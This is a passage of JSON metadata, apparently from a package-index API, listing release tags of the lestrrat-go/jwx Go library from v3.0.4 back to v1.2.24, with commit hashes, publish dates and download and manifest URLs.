x/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.co